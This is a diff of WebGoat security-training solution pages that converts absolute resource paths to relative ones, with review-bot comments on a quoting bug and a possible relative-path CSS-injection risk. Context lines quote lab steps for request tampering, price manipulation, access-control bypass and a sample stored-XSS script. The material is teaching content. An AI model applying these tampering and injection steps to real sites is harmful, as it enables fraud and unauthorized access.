</table>
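Review bot: The footer cell two lines above the changed logo, `<td valign='MIDDLE' width='100%' align='RIGHT class=MsoNormal' style=...>`, has a misplaced quote that folds the `class` attribute into the `align` value, so the alignment value becomes `RIGHT class=MsoNormal` and the `MsoNormal` class is never applied. Since this hunk already edits the footer, I would fix it in the same commit: `align='RIGHT' class='MsoNormal'`. The logo on the changed line, `src='images/logos/zionsecurity.gif'`, is now document-relative like the rest of the file, so it resolves correctly only when the solution is embedded by a page sitting directly under the context root; the embedding servlet is outside this hunk, so treat that as something to confirm rather than a given.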


@ -3,7 +3,7 @@
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<title>Insecure Login</title>
<link rel="stylesheet" type="text/css" href="/WebGoat/lesson_solutions/formate.css">
<link rel="stylesheet" type="text/css" href="lesson_solutions/formate.css">
</head>
<body>
<p><b>Lesson Plan Title:</b>Insecure Login</p>
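Review bot: The stylesheet reference on the new line, `<link rel="stylesheet" type="text/css" href="lesson_solutions/formate.css">`, is now document-relative, so where it resolves depends on the URL of whatever page embeds this HTML rather than on the deployed context path. That only holds if the solution is always rendered inline by a servlet whose URL sits directly under the context root; if that servlet tolerates extra path segments (e.g. `/<ctx>/attack/x/`) or the file is ever fetched at its own URL, the stylesheet resolves under that extra segment, which is the relative-path-overwrite setup that turns a path-tolerant URL into CSS injection. I cannot see the embedding servlet from this hunk, so verify it rejects path info, or emit the href from `getContextPath()` instead of relying on the base URL. Either way I would record the assumption at the top of the file, `<!-- hrefs are relative to the WebGoat context root; this file is rendered inline by the attack page, never served directly -->`.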


@ -9,8 +9,8 @@ xmlns="http://www.w3.org/TR/REC-html40">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 12">
<meta name=Originator content="Microsoft Word 12">
<link rel=File-List href="/WebGoat/lesson_solutions/JSONInjection_files/filelist.xml">
<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/JSONInjection_files/editdata.mso">
<link rel=File-List href="lesson_solutions/JSONInjection_files/filelist.xml">
<link rel=Edit-Time-Data href="lesson_solutions/JSONInjection_files/editdata.mso">
<!--[if !mso]>
<style>
v\:* {behavior:url(#default#VML);}
@ -36,8 +36,8 @@ w\:* {behavior:url(#default#VML);}
<o:Version>12.00</o:Version>
</o:DocumentProperties>
</xml><![endif]-->
<link rel=themeData href="/WebGoat/lesson_solutions/JSONInjection_files/themedata.thmx">
<link rel=colorSchemeMapping href="/WebGoat/lesson_solutions/JSONInjection_files/colorschememapping.xml">
<link rel=themeData href="lesson_solutions/JSONInjection_files/themedata.thmx">
<link rel=colorSchemeMapping href="lesson_solutions/JSONInjection_files/colorschememapping.xml">
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:Zoom>90</w:Zoom>
@ -670,9 +670,9 @@ yes'><!--[if gte vml 1]><v:shapetype id="_x0000_t75" coordsize="21600,21600"
<o:lock v:ext="edit" aspectratio="t"/>
</v:shapetype><v:shape id="Picture_x0020_77" o:spid="_x0000_i1030" type="#_x0000_t75"
style='width:480pt;height:277.5pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/JSONInjection_files/image001.png" o:title=""/>
<v:imagedata src="lesson_solutions/JSONInjection_files/image001.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=370
src="/WebGoat/lesson_solutions/JSONInjection_files/image013.jpg" v:shapes="Picture_x0020_77"><![endif]></span></p>
src="lesson_solutions/JSONInjection_files/image013.jpg" v:shapes="Picture_x0020_77"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -702,9 +702,9 @@ bold'><o:p>&nbsp;</o:p></span></p>
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_78"
o:spid="_x0000_i1029" type="#_x0000_t75" style='width:481.5pt;height:345pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/JSONInjection_files/image003.png" o:title=""/>
<v:imagedata src="lesson_solutions/JSONInjection_files/image003.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=642 height=460
src="/WebGoat/lesson_solutions/JSONInjection_files/image014.jpg" v:shapes="Picture_x0020_78"><![endif]></span></p>
src="lesson_solutions/JSONInjection_files/image014.jpg" v:shapes="Picture_x0020_78"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -718,9 +718,9 @@ field-end'></span><![endif]--> Intercept HTTP Request</p>
yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_79" o:spid="_x0000_i1028"
type="#_x0000_t75" style='width:481.5pt;height:345pt;visibility:visible;
mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/JSONInjection_files/image005.png" o:title=""/>
<v:imagedata src="lesson_solutions/JSONInjection_files/image005.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=642 height=460
src="/WebGoat/lesson_solutions/JSONInjection_files/image015.jpg" v:shapes="Picture_x0020_79"><![endif]></span></p>
src="lesson_solutions/JSONInjection_files/image015.jpg" v:shapes="Picture_x0020_79"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -741,9 +741,9 @@ price for the expensive flight of $600 to $100 and click "Accept changes".<o:p><
yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_80" o:spid="_x0000_i1027"
type="#_x0000_t75" style='width:481.5pt;height:345pt;visibility:visible;
mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/JSONInjection_files/image007.png" o:title=""/>
<v:imagedata src="lesson_solutions/JSONInjection_files/image007.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=642 height=460
src="/WebGoat/lesson_solutions/JSONInjection_files/image016.jpg" v:shapes="Picture_x0020_80"><![endif]></span></p>
src="lesson_solutions/JSONInjection_files/image016.jpg" v:shapes="Picture_x0020_80"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -757,9 +757,9 @@ field-end'></span><![endif]--> Updated price</p>
yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_81" o:spid="_x0000_i1026"
type="#_x0000_t75" style='width:480pt;height:277.5pt;visibility:visible;
mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/JSONInjection_files/image009.png" o:title=""/>
<v:imagedata src="lesson_solutions/JSONInjection_files/image009.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=370
src="/WebGoat/lesson_solutions/JSONInjection_files/image017.jpg" v:shapes="Picture_x0020_81"><![endif]></span></p>
src="lesson_solutions/JSONInjection_files/image017.jpg" v:shapes="Picture_x0020_81"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -778,9 +778,9 @@ with no stops and the updated price and click "Submit".<o:p></o:p></span></p>
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_82"
o:spid="_x0000_i1025" type="#_x0000_t75" style='width:480pt;height:277.5pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/JSONInjection_files/image011.png" o:title=""/>
<v:imagedata src="lesson_solutions/JSONInjection_files/image011.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=370
src="/WebGoat/lesson_solutions/JSONInjection_files/image018.jpg" v:shapes="Picture_x0020_82"><![endif]></span></p>
src="lesson_solutions/JSONInjection_files/image018.jpg" v:shapes="Picture_x0020_82"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC


@ -9,8 +9,8 @@ xmlns="http://www.w3.org/TR/REC-html40">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 12">
<meta name=Originator content="Microsoft Word 12">
<link rel=File-List href="/WebGoat/lesson_solutions/JavaScriptValidation_files/filelist.xml">
<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/JavaScriptValidation_files/editdata.mso">
<link rel=File-List href="lesson_solutions/JavaScriptValidation_files/filelist.xml">
<link rel=Edit-Time-Data href="lesson_solutions/JavaScriptValidation_files/editdata.mso">
<!--[if !mso]>
<style>
v\:* {behavior:url(#default#VML);}
@ -36,9 +36,9 @@ w\:* {behavior:url(#default#VML);}
<o:Version>12.00</o:Version>
</o:DocumentProperties>
</xml><![endif]-->
<link rel=themeData href="/WebGoat/lesson_solutions/JavaScriptValidation_files/themedata.thmx">
<link rel=themeData href="lesson_solutions/JavaScriptValidation_files/themedata.thmx">
<link rel=colorSchemeMapping
href="/WebGoat/lesson_solutions/JavaScriptValidation_files/colorschememapping.xml">
href="lesson_solutions/JavaScriptValidation_files/colorschememapping.xml">
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:TrackMoves>false</w:TrackMoves>
@ -573,9 +573,9 @@ yes'><!--[if gte vml 1]><v:shapetype id="_x0000_t75" coordsize="21600,21600"
<o:lock v:ext="edit" aspectratio="t"/>
</v:shapetype><v:shape id="Picture_x0020_176" o:spid="_x0000_i1035" type="#_x0000_t75"
style='width:480pt;height:276.75pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/JavaScriptValidation_files/image001.png" o:title=""/>
<v:imagedata src="lesson_solutions/JavaScriptValidation_files/image001.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=369
src="/WebGoat/lesson_solutions/JavaScriptValidation_files/image002.jpg" v:shapes="Picture_x0020_176"><![endif]></span><span
src="lesson_solutions/JavaScriptValidation_files/image002.jpg" v:shapes="Picture_x0020_176"><![endif]></span><span
style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
<p class=MsoNormal style='page-break-after:avoid'><o:p>&nbsp;</o:p></p>
@ -605,9 +605,9 @@ normal'><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span><
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_177"
o:spid="_x0000_i1034" type="#_x0000_t75" style='width:480pt;height:276.75pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/JavaScriptValidation_files/image003.png" o:title=""/>
<v:imagedata src="lesson_solutions/JavaScriptValidation_files/image003.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=369
src="/WebGoat/lesson_solutions/JavaScriptValidation_files/image004.jpg" v:shapes="Picture_x0020_177"><![endif]></span></p>
src="lesson_solutions/JavaScriptValidation_files/image004.jpg" v:shapes="Picture_x0020_177"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -626,9 +626,9 @@ symbols to the fields and click "Accept changes".<o:p></o:p></span></p>
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_178"
o:spid="_x0000_i1033" type="#_x0000_t75" style='width:480pt;height:276.75pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/JavaScriptValidation_files/image005.png" o:title=""/>
<v:imagedata src="lesson_solutions/JavaScriptValidation_files/image005.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=369
src="/WebGoat/lesson_solutions/JavaScriptValidation_files/image006.jpg" v:shapes="Picture_x0020_178"><![endif]></span></p>
src="lesson_solutions/JavaScriptValidation_files/image006.jpg" v:shapes="Picture_x0020_178"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -642,9 +642,9 @@ field-end'></span><![endif]--> Change parameters<span style='font-family:"Arial"
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_179"
o:spid="_x0000_i1032" type="#_x0000_t75" style='width:480pt;height:276.75pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/JavaScriptValidation_files/image007.png" o:title=""/>
<v:imagedata src="lesson_solutions/JavaScriptValidation_files/image007.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=369
src="/WebGoat/lesson_solutions/JavaScriptValidation_files/image008.jpg" v:shapes="Picture_x0020_179"><![endif]></span><span
src="lesson_solutions/JavaScriptValidation_files/image008.jpg" v:shapes="Picture_x0020_179"><![endif]></span><span
style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
<p class=MsoCaption><span style='font-family:"Arial","sans-serif"'>Figure </span><!--[if supportFields]><span
@ -673,13 +673,13 @@ Validation" and intercept the response in WebScarab.<o:p></o:p></span></p>
width:82.65pt;height:27pt;z-index:1' filled="f" strokecolor="red"/><![endif]--><![if !vml]><span
style='mso-ignore:vglayout;position:absolute;z-index:1;margin-left:314px;
margin-top:9px;width:113px;height:38px'><img width=113 height=38
src="/WebGoat/lesson_solutions/JavaScriptValidation_files/image009.gif" v:shapes="_x0000_s1026"></span><![endif]><span
src="lesson_solutions/JavaScriptValidation_files/image009.gif" v:shapes="_x0000_s1026"></span><![endif]><span
style='font-family:"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape
id="Picture_x0020_180" o:spid="_x0000_i1031" type="#_x0000_t75" style='width:480pt;
height:276.75pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/JavaScriptValidation_files/image010.png" o:title=""/>
<v:imagedata src="lesson_solutions/JavaScriptValidation_files/image010.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=369
src="/WebGoat/lesson_solutions/JavaScriptValidation_files/image011.jpg" v:shapes="Picture_x0020_180"><![endif]></span></p>
src="lesson_solutions/JavaScriptValidation_files/image011.jpg" v:shapes="Picture_x0020_180"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -694,9 +694,9 @@ style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_181"
o:spid="_x0000_i1030" type="#_x0000_t75" style='width:480pt;height:276.75pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/JavaScriptValidation_files/image012.png" o:title=""/>
<v:imagedata src="lesson_solutions/JavaScriptValidation_files/image012.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=369
src="/WebGoat/lesson_solutions/JavaScriptValidation_files/image013.jpg" v:shapes="Picture_x0020_181"><![endif]></span></p>
src="lesson_solutions/JavaScriptValidation_files/image013.jpg" v:shapes="Picture_x0020_181"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -719,9 +719,9 @@ validate() Javascript function in the HTML page.<o:p></o:p></span></p>
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_182"
o:spid="_x0000_i1029" type="#_x0000_t75" style='width:480pt;height:276.75pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/JavaScriptValidation_files/image014.png" o:title=""/>
<v:imagedata src="lesson_solutions/JavaScriptValidation_files/image014.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=369
src="/WebGoat/lesson_solutions/JavaScriptValidation_files/image015.jpg" v:shapes="Picture_x0020_182"><![endif]></span></p>
src="lesson_solutions/JavaScriptValidation_files/image015.jpg" v:shapes="Picture_x0020_182"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -740,9 +740,9 @@ expressions will remove the Javascript validation and submit the form.<o:p></o:p
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_183"
o:spid="_x0000_i1028" type="#_x0000_t75" style='width:480pt;height:276.75pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/JavaScriptValidation_files/image016.png" o:title=""/>
<v:imagedata src="lesson_solutions/JavaScriptValidation_files/image016.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=369
src="/WebGoat/lesson_solutions/JavaScriptValidation_files/image017.jpg" v:shapes="Picture_x0020_183"><![endif]></span></p>
src="lesson_solutions/JavaScriptValidation_files/image017.jpg" v:shapes="Picture_x0020_183"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -763,9 +763,9 @@ expression checks.<o:p></o:p></span></p>
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_184"
o:spid="_x0000_i1027" type="#_x0000_t75" style='width:480pt;height:276.75pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/JavaScriptValidation_files/image018.png" o:title=""/>
<v:imagedata src="lesson_solutions/JavaScriptValidation_files/image018.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=369
src="/WebGoat/lesson_solutions/JavaScriptValidation_files/image019.jpg" v:shapes="Picture_x0020_184"><![endif]></span></p>
src="lesson_solutions/JavaScriptValidation_files/image019.jpg" v:shapes="Picture_x0020_184"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -784,9 +784,9 @@ fields in the HTML page to contain symbols like @#@@# and click "Submit". <o:p><
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_185"
o:spid="_x0000_i1026" type="#_x0000_t75" style='width:480pt;height:276.75pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/JavaScriptValidation_files/image020.png" o:title=""/>
<v:imagedata src="lesson_solutions/JavaScriptValidation_files/image020.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=369
src="/WebGoat/lesson_solutions/JavaScriptValidation_files/image021.jpg" v:shapes="Picture_x0020_185"><![endif]></span><span
src="lesson_solutions/JavaScriptValidation_files/image021.jpg" v:shapes="Picture_x0020_185"><![endif]></span><span
style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
<p class=MsoCaption><span style='font-family:"Arial","sans-serif"'>Figure </span><!--[if supportFields]><span
@ -803,9 +803,9 @@ style='font-family:"Arial","sans-serif"'> No more regular expression checks<o:p>
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_186"
o:spid="_x0000_i1025" type="#_x0000_t75" style='width:480pt;height:276.75pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/JavaScriptValidation_files/image022.png" o:title=""/>
<v:imagedata src="lesson_solutions/JavaScriptValidation_files/image022.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=369
src="/WebGoat/lesson_solutions/JavaScriptValidation_files/image023.jpg" v:shapes="Picture_x0020_186"><![endif]></span><span
src="lesson_solutions/JavaScriptValidation_files/image023.jpg" v:shapes="Picture_x0020_186"><![endif]></span><span
style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
<p class=MsoCaption><span style='font-family:"Arial","sans-serif"'>Figure </span><!--[if supportFields]><span


@ -3,7 +3,7 @@
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<title>Solution Lab Role Based Access Control Stage2</title>
<link rel="stylesheet" type="text/css" href="/WebGoat/lesson_solutions/formate.css">
<link rel="stylesheet" type="text/css" href="lesson_solutions/formate.css">
</head>
<body>
<p><b>Lesson Plan Title:</b> How to Perform Cross Site Scripting (XSS)</p>
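Review bot: The stylesheet link on the changed line now depends on the page's base URL, which this diff does not show: `lesson_solutions/formate.css` resolves to the intended file only when the solution HTML is served from a URL whose directory is the one containing `lesson_solutions/`, and would resolve to `.../lesson_solutions/lesson_solutions/formate.css` if the file is ever opened at its own path. If these pages are only ever embedded by the lesson servlet this is fine; otherwise a `<base href>` emitted by the server, or the request context path, would make the base explicit. The same consideration applies to every other `lesson_solutions/` link and image path changed in this commit.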


@ -3,7 +3,7 @@
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<title>Solution Lab Role Based Access Control Stage4</title>
<link rel="stylesheet" type="text/css" href="/WebGoat/lesson_solutions/formate.css">
<link rel="stylesheet" type="text/css" href="lesson_solutions/formate.css">
</head>
<body>
<p><b>Lesson Plan Title:</b> How to Perform Cross Site Scripting (XSS)</p>


@ -3,7 +3,7 @@
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<title>Solution Lab Role Based Access Control Stage1</title>
<link rel="stylesheet" type="text/css" href="/WebGoat/lesson_solutions/formate.css">
<link rel="stylesheet" type="text/css" href="lesson_solutions/formate.css">
</head>
<body>
<p><b>Lesson Plan Title:</b> How to Perform Cross Site Scripting (XSS)</p>
@ -36,7 +36,7 @@ it because it has a really logical name.
But we will look it up. So your first step is to log in as John with john as
password. Use WebScarab to intercept the delete request.
<img src="/WebGoat/lesson_solutions/Lab Access Control/images/access_control_stage1.png" width=450px alt="deleteAction" />
<img src="lesson_solutions/Lab Access Control/images/access_control_stage1.png" width=450px alt="deleteAction" />
As you can see the delete action is called DeleteProfile.
Now log in as Tom. Click in the list on his name and make sure WebScarab


@ -3,7 +3,7 @@
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<title>Solution Lab Role Based Access Control Stage3</title>
<link rel="stylesheet" type="text/css" href="/WebGoat/lesson_solutions/formate.css">
<link rel="stylesheet" type="text/css" href="lesson_solutions/formate.css">
</head>
<body>
<p><b>Lesson Plan Title:</b> How to Perform Cross Site Scripting (XSS)</p>
@ -39,7 +39,7 @@ of another employee!
Log in as Tom with tom as password. Click on Tom's name in the list and make sure
webscarab will intercept the next request. Change the employee_id for example to 101.<br><br>
<img src="/WebGoat/lesson_solutions/Lab Access Control/images/access_control_stage1.png" width=450px alt="deleteAction" />
<img src="lesson_solutions/Lab Access Control/images/access_control_stage1.png" width=450px alt="deleteAction" />
</body>


@ -4,7 +4,7 @@
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<title>Solution Lab SQL Injection Stage3</title>
<link rel="stylesheet" type="text/css"
href="/WebGoat/lesson_solutions/formate.css">
href="lesson_solutions/formate.css">
</head>
<body>
<p><b>Lesson Plan Title:</b> How to Perform a SQLInjection</p>


@ -4,7 +4,7 @@
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<title>Solution Lab SQL Injection Stage2</title>
<link rel="stylesheet" type="text/css"
href="/WebGoat/lesson_solutions/formate.css">
href="lesson_solutions/formate.css">
</head>
<body>
<p><b>Lesson Plan Title:</b> How to Perform a SQLInjection</p>


@ -4,7 +4,7 @@
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<title>Solution Lab SQL Injection Stage4</title>
<link rel="stylesheet" type="text/css"
href="/WebGoat/lesson_solutions/formate.css">
href="lesson_solutions/formate.css">
</head>
<body>
<p><b>Lesson Plan Title:</b> How to Perform a SQLInjection</p>


@ -4,7 +4,7 @@
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<title>Solution Lab SQL Injection Stage1</title>
<link rel="stylesheet" type="text/css"
href="/WebGoat/lesson_solutions/formate.css">
href="lesson_solutions/formate.css">
</head>
<body>
<p><b>Lesson Plan Title:</b> How to Perform a SQLInjection</p>


@ -3,7 +3,7 @@
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<title>Solution Lab Block Stored XSS</title>
<link rel="stylesheet" type="text/css" href="/WebGoat/lesson_solutions/formate.css">
<link rel="stylesheet" type="text/css" href="lesson_solutions/formate.css">
</head>
<body>
<p><b>Lesson Plan Title:</b> How to Perform Cross Site Scripting (XSS)</p>


@ -3,7 +3,7 @@
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<title>Solution Lab Block Stored XSS</title>
<link rel="stylesheet" type="text/css" href="/WebGoat/lesson_solutions/formate.css">
<link rel="stylesheet" type="text/css" href="lesson_solutions/formate.css">
</head>
<body>
<p><b>Lesson Plan Title:</b> How to Perform Cross Site Scripting (XSS)</p>


@ -3,7 +3,7 @@
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<title>Solution Lab Block Stored XSS</title>
<link rel="stylesheet" type="text/css" href="/WebGoat/lesson_solutions/formate.css">
<link rel="stylesheet" type="text/css" href="lesson_solutions/formate.css">
</head>
<body>
<p><b>Lesson Plan Title:</b> How to Perform Cross Site Scripting (XSS)</p>


@ -3,7 +3,7 @@
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<title>Solution Lab Block Stored XSS</title>
<link rel="stylesheet" type="text/css" href="/WebGoat/lesson_solutions/formate.css">
<link rel="stylesheet" type="text/css" href="lesson_solutions/formate.css">
</head>
<body>
<p><b>Lesson Plan Title:</b> How to Perform Cross Site Scripting (XSS)</p>


@ -3,7 +3,7 @@
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<title>Solution Lab Block Stored XSS</title>
<link rel="stylesheet" type="text/css" href="/WebGoat/lesson_solutions/formate.css">
<link rel="stylesheet" type="text/css" href="lesson_solutions/formate.css">
</head>
<body>
<p><b>Lesson Plan Title:</b> How to Perform Cross Site Scripting (XSS)</p>


@ -3,7 +3,7 @@
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<title>Solution Lab Block Stored XSS</title>
<link rel="stylesheet" type="text/css" href="/WebGoat/lesson_solutions/formate.css">
<link rel="stylesheet" type="text/css" href="lesson_solutions/formate.css">
</head>
<body>
<p><b>Lesson Plan Title:</b> How to Perform Cross Site Scripting (XSS)</p>
@ -24,7 +24,7 @@ For example: &lt;script&gt;alert("Got Ya");&lt;/script&gt;<br/>
Click on the UpdateProfile Button and Log out.</p><p>
<p>
<img src="/WebGoat/lesson_solutions/Lab XSS/images/stored_xss.png" width=450px alt="stored_xss.png" />
<img src="lesson_solutions/Lab XSS/images/stored_xss.png" width=450px alt="stored_xss.png" />
<p>
Now log in as Jerry with jerry as password. Select from the the list the profile of tom and hit the


@ -9,8 +9,8 @@ xmlns="http://www.w3.org/TR/REC-html40">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 12">
<meta name=Originator content="Microsoft Word 12">
<link rel=File-List href="/WebGoat/lesson_solutions/LogSpoofing_files/filelist.xml">
<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/LogSpoofing_files/editdata.mso">
<link rel=File-List href="lesson_solutions/LogSpoofing_files/filelist.xml">
<link rel=Edit-Time-Data href="lesson_solutions/LogSpoofing_files/editdata.mso">
<!--[if !mso]>
<style>
v\:* {behavior:url(#default#VML);}
@ -36,8 +36,8 @@ w\:* {behavior:url(#default#VML);}
<o:Version>12.00</o:Version>
</o:DocumentProperties>
</xml><![endif]-->
<link rel=themeData href="/WebGoat/lesson_solutions/LogSpoofing_files/themedata.thmx">
<link rel=colorSchemeMapping href="/WebGoat/lesson_solutions/LogSpoofing_files/colorschememapping.xml">
<link rel=themeData href="lesson_solutions/LogSpoofing_files/themedata.thmx">
<link rel=colorSchemeMapping href="lesson_solutions/LogSpoofing_files/colorschememapping.xml">
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:Zoom>90</w:Zoom>
@ -692,9 +692,9 @@ style='mso-spacerun:yes'>
<o:lock v:ext="edit" aspectratio="t"/>
</v:shapetype><v:shape id="Picture_x0020_135" o:spid="_x0000_i1027" type="#_x0000_t75"
style='width:480pt;height:277.5pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/LogSpoofing_files/image001.png" o:title=""/>
<v:imagedata src="lesson_solutions/LogSpoofing_files/image001.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=370
src="/WebGoat/lesson_solutions/LogSpoofing_files/image007.jpg" v:shapes="Picture_x0020_135"><![endif]></span></p>
src="lesson_solutions/LogSpoofing_files/image007.jpg" v:shapes="Picture_x0020_135"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -725,9 +725,9 @@ bold'><o:p>&nbsp;</o:p></span></p>
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_136"
o:spid="_x0000_i1026" type="#_x0000_t75" style='width:480pt;height:277.5pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/LogSpoofing_files/image003.png" o:title=""/>
<v:imagedata src="lesson_solutions/LogSpoofing_files/image003.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=370
